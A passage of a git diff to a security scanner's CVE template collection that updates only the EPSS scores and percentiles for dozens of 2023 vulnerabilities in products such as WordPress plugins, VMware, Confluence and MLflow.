a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index e5e929f2e9f..bedefafa72c 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.19296 - epss-percentile: 0.95172 + epss-percentile: 0.95171 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 0c560a6d3b3..f85ef8d96da 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-0968 cwe-id: CWE-79 epss-score: 0.12288 - epss-percentile: 0.93647 + epss-percentile: 0.93642 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 31016a22d5d..aea8d92e7a2 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-1080 cwe-id: CWE-79 epss-score: 0.26356 - epss-percentile: 0.96153 + epss-percentile: 0.96156 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 76505e58c16..7e410ad09ad 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1177 cwe-id: CWE-29,CWE-22 - epss-score: 0.93237 - epss-percentile: 0.99789 + epss-score: 0.93326 + epss-percentile: 0.99799 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 1a0efd8133c..5452837fda9 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-1263 cwe-id: CWE-200 epss-score: 0.10375 - epss-percentile: 0.92988 + epss-percentile: 0.92981 cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1315.yaml b/http/cves/2023/CVE-2023-1315.yaml index 56c4c315cb4..ed74b5373a7 100644 --- a/http/cves/2023/CVE-2023-1315.yaml +++ b/http/cves/2023/CVE-2023-1315.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1315 cwe-id: CWE-79 epss-score: 0.33835 - epss-percentile: 0.96824 + epss-percentile: 0.96825 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-1318.yaml b/http/cves/2023/CVE-2023-1318.yaml index 6c86a0a1011..98615facd80 100644 --- a/http/cves/2023/CVE-2023-1318.yaml +++ b/http/cves/2023/CVE-2023-1318.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1318 cwe-id: CWE-79 epss-score: 0.12866 - epss-percentile: 0.93824 + epss-percentile: 0.9382 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 7 diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 5a916564c8a..4d2dde1916f 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-1362 cwe-id: CWE-1021 epss-score: 0.65799 - epss-percentile: 0.98446 + epss-percentile: 0.98449 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1389.yaml b/http/cves/2023/CVE-2023-1389.yaml index 9e90079bac8..1144be50370 100644 --- a/http/cves/2023/CVE-2023-1389.yaml +++ b/http/cves/2023/CVE-2023-1389.yaml @@ -17,8 +17,8 @@ info: classification: cve-id: CVE-2023-1389 cwe-id: CWE-78 - epss-score: 0.93807 - epss-percentile: 0.99852 + epss-score: 0.93466 + epss-percentile: 0.99811 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 metadata: diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index b6e698c8491..9fde4ac37aa 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.25305 - epss-percentile: 0.96026 + epss-percentile: 0.96029 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 173a612c946..112462cc3eb 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-1719 cwe-id: CWE-665 epss-score: 0.84768 - epss-percentile: 0.99306 + epss-percentile: 0.99305 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index b7e203294d3..bc005a9b5b5 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-1730 cwe-id: CWE-89 epss-score: 0.75117 - epss-percentile: 0.98832 + epss-percentile: 0.98829 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index d25bdd1d63e..6165e52d09b 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.12604 - epss-percentile: 0.93746 + epss-percentile: 0.93741 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 626da666e2d..c6ce822dcdb 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-1890 cwe-id: CWE-79 epss-score: 0.10824 - epss-percentile: 0.93142 + epss-percentile: 0.93136 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index d2ca5dfd0b5..bcfaef7d071 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-1892 cwe-id: CWE-79 epss-score: 0.79594 - epss-percentile: 0.99047 + epss-percentile: 0.99045 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2023/CVE-2023-1893.yaml b/http/cves/2023/CVE-2023-1893.yaml index 49408a6529b..d5b059184fc 100644 --- a/http/cves/2023/CVE-2023-1893.yaml +++ b/http/cves/2023/CVE-2023-1893.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-1893 cwe-id: CWE-79 epss-score: 0.01843 - epss-percentile: 0.82521 + epss-percentile: 0.82519 cpe: cpe:2.3:a:login_configurator_project:login_configurator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 92df5417210..b78ce461194 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-20073 cwe-id: CWE-434 epss-score: 0.9134 - epss-percentile: 0.99638 + epss-percentile: 0.99637 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index c607beaf288..04f4bb7bb42 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2009 cwe-id: CWE-79 epss-score: 0.01944 - epss-percentile: 0.83014 + epss-percentile: 0.83012 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 2871bba094e..3dd70cb6fa1 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2059 cwe-id: CWE-28 epss-score: 0.04964 - epss-percentile: 0.89356 + epss-percentile: 0.89355 cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 2fac043bc71..a3006136213 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-20864 cwe-id: CWE-502 epss-score: 0.92927 - epss-percentile: 0.99763 + epss-percentile: 0.99762 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index fe52763951d..bac27b2c434 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-20887 cwe-id: CWE-77 epss-score: 0.94393 - epss-percentile: 0.9997 + epss-percentile: 0.99969 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index f9d42dc1785..fa392fc4d6a 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-20888 cwe-id: CWE-502 epss-score: 0.90925 - epss-percentile: 0.99614 + epss-percentile: 0.99612 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index ffdc177615c..a66fed04d0d 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.22608 - epss-percentile: 0.95664 + epss-percentile: 0.95668 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 979a96634a9..81c1037221a 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-2130 cwe-id: CWE-89 epss-score: 0.81183 - epss-percentile: 0.99124 + epss-percentile: 0.99127 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 8a82c12cd34..9b8740819a7 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-22232 cwe-id: CWE-284,NVD-CWE-noinfo epss-score: 0.88427 - epss-percentile: 0.99477 + epss-percentile: 0.99476 cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index b075f0e59c8..34eb4069ca1 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2224 cwe-id: CWE-79 epss-score: 0.00924 - epss-percentile: 0.75547 + epss-percentile: 0.75538 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index 9057e0beff8..4e934da0709 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2227 cwe-id: CWE-285 epss-score: 0.90923 - epss-percentile: 0.99614 + epss-percentile: 0.99611 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 461ddfd8808..26376e22b12 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-22478 cwe-id: CWE-862 epss-score: 0.81122 - epss-percentile: 0.99119 + epss-percentile: 0.99122 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 232a8a9617b..851825218c2 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-22515 - epss-score: 0.94326 - epss-percentile: 0.99948 + epss-score: 0.9438 + epss-percentile: 0.99965 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 0ec90cc7639..b9f5f05a062 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-22518 cwe-id: CWE-863 epss-score: 0.94375 - epss-percentile: 0.99963 + epss-percentile: 0.99962 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index ec34c71b692..d1158e1bc31 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2252 cwe-id: CWE-22 epss-score: 0.10304 - epss-percentile: 0.92958 + epss-percentile: 0.9295 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22621.yaml b/http/cves/2023/CVE-2023-22621.yaml index 3212cad55f5..7849d59713f 100644 --- a/http/cves/2023/CVE-2023-22621.yaml +++ b/http/cves/2023/CVE-2023-22621.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-22621 cwe-id: CWE-74 epss-score: 0.82899 - epss-percentile: 0.99224 + epss-percentile: 0.99223 cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22893.yaml b/http/cves/2023/CVE-2023-22893.yaml index 958a474f348..a8c93e6f8b4 100644 --- a/http/cves/2023/CVE-2023-22893.yaml +++ b/http/cves/2023/CVE-2023-22893.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-22893 cwe-id: CWE-287 epss-score: 0.66479 - epss-percentile: 0.98472 + epss-percentile: 0.98474 cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2309.yaml b/http/cves/2023/CVE-2023-2309.yaml index d26f76b7098..f70880ffae0 100644 --- a/http/cves/2023/CVE-2023-2309.yaml +++ b/http/cves/2023/CVE-2023-2309.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2309 epss-score: 0.11967 - epss-percentile: 0.93551 + epss-percentile: 0.93544 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 4a725cf0759..eec0381f631 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-23161 cwe-id: CWE-79 epss-score: 0.07984 - epss-percentile: 0.9182 + epss-percentile: 0.91817 cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 636d330b68d..e22bb29102f 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-23488 cwe-id: CWE-89 epss-score: 0.84182 - epss-percentile: 0.99282 + epss-percentile: 0.99281 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 8b823f7f0b5..58bb8cfed6f 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-23491 cwe-id: CWE-79 epss-score: 0.07588 - epss-percentile: 0.91578 + epss-percentile: 0.91577 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23897.yaml b/http/cves/2023/CVE-2023-23897.yaml index 079128c0048..9238565dbe1 100644 --- a/http/cves/2023/CVE-2023-23897.yaml +++ b/http/cves/2023/CVE-2023-23897.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-23897 cwe-id: CWE-352 epss-score: 0.40065 - epss-percentile: 0.97204 + epss-percentile: 0.97203 cpe: cpe:2.3:a:ozette:simple_mobile_url_redirect:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index 841e608d48f..f80e0e8c46a 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.49739 - epss-percentile: 0.97718 + epss-percentile: 0.97712 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 7e5cd7364b8..fba104f24c4 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-24322 cwe-id: CWE-79 epss-score: 0.19147 - epss-percentile: 0.95147 + epss-percentile: 0.95146 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 3b1b315ba30..6259c837bf3 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-24657 cwe-id: CWE-79 epss-score: 0.0274 - epss-percentile: 0.85569 + epss-percentile: 0.85565 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index d34e8f6d590..20cb0ba1456 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24733 cwe-id: CWE-79 epss-score: 0.11698 - epss-percentile: 0.93476 + epss-percentile: 0.9347 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 002264e2bb6..4cd110ae9e5 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24735 cwe-id: CWE-601 epss-score: 0.09478 - epss-percentile: 0.92584 + epss-percentile: 0.92577 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 2e24566605e..cbd3624ff79 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24737 cwe-id: CWE-79 epss-score: 0.1156 - epss-percentile: 0.93425 + epss-percentile: 0.9342 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2518.yaml b/http/cves/2023/CVE-2023-2518.yaml index 50cdd26bc1a..cfc724bc680 100644 --- a/http/cves/2023/CVE-2023-2518.yaml +++ b/http/cves/2023/CVE-2023-2518.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2518 cwe-id: CWE-79 epss-score: 0.11445 - epss-percentile: 0.93384 + epss-percentile: 0.93378 cpe: cpe:2.3:a:yikesinc:easy_forms_for_mailchimp:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index 8f42544a86f..062b9e12bad 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-25194 cwe-id: CWE-502 epss-score: 0.94055 - epss-percentile: 0.99896 + epss-percentile: 0.99894 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25280.yaml b/http/cves/2023/CVE-2023-25280.yaml index 1e0ecf852d3..34006f26266 100644 --- a/http/cves/2023/CVE-2023-25280.yaml +++ b/http/cves/2023/CVE-2023-25280.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-25280 cwe-id: CWE-78 epss-score: 0.92752 - epss-percentile: 0.99746 + epss-percentile: 0.99745 cpe: cpe:2.3:o:dlink:dir820la1_firmware:105b03:*:*:*:*:*:*:* metadata: vendor: dlink diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 806cb112338..6daa98f29da 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-25346 cwe-id: CWE-79 epss-score: 0.09598 - epss-percentile: 0.92633 + epss-percentile: 0.92627 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 4dcb130b3d3..9979ef72e12 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-25573 cwe-id: CWE-862 epss-score: 0.93455 - epss-percentile: 0.99811 + epss-percentile: 0.9981 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index a7f12c9ae7d..6127ea15383 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-26035 cwe-id: CWE-862 epss-score: 0.49634 - epss-percentile: 0.97713 + epss-percentile: 0.97707 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 98335ae76c6..d8038adfa7a 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.92175 - epss-percentile: 0.99697 + epss-percentile: 0.99696 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2624.yaml b/http/cves/2023/CVE-2023-2624.yaml index 14ee22ce343..3ad14fc5f41 100644 --- a/http/cves/2023/CVE-2023-2624.yaml +++ b/http/cves/2023/CVE-2023-2624.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2624 epss-score: 0.10752 - epss-percentile: 0.93119 + epss-percentile: 0.93113 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 264b9c8a1a6..953291cdb29 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-26255 cwe-id: CWE-22 epss-score: 0.93558 - epss-percentile: 0.99819 + epss-percentile: 0.99821 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 5a8ce13021f..0bfa475920e 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-26842 cwe-id: CWE-79 epss-score: 0.17468 - epss-percentile: 0.94862 + epss-percentile: 0.94861 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 81de99e6e21..975ef4e96a7 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-26843 cwe-id: CWE-79 epss-score: 0.12574 - epss-percentile: 0.93739 + epss-percentile: 0.93734 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 00081edbfa4..794ef56fc74 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27008 cwe-id: CWE-79 epss-score: 0.25117 - epss-percentile: 0.96003 + epss-percentile: 0.96006 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index b143a0c6300..c47a00e8d1a 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-27032 cwe-id: CWE-89 epss-score: 0.4769 - epss-percentile: 0.97611 + epss-percentile: 0.97605 cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 5816815314a..24e20f8210b 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ 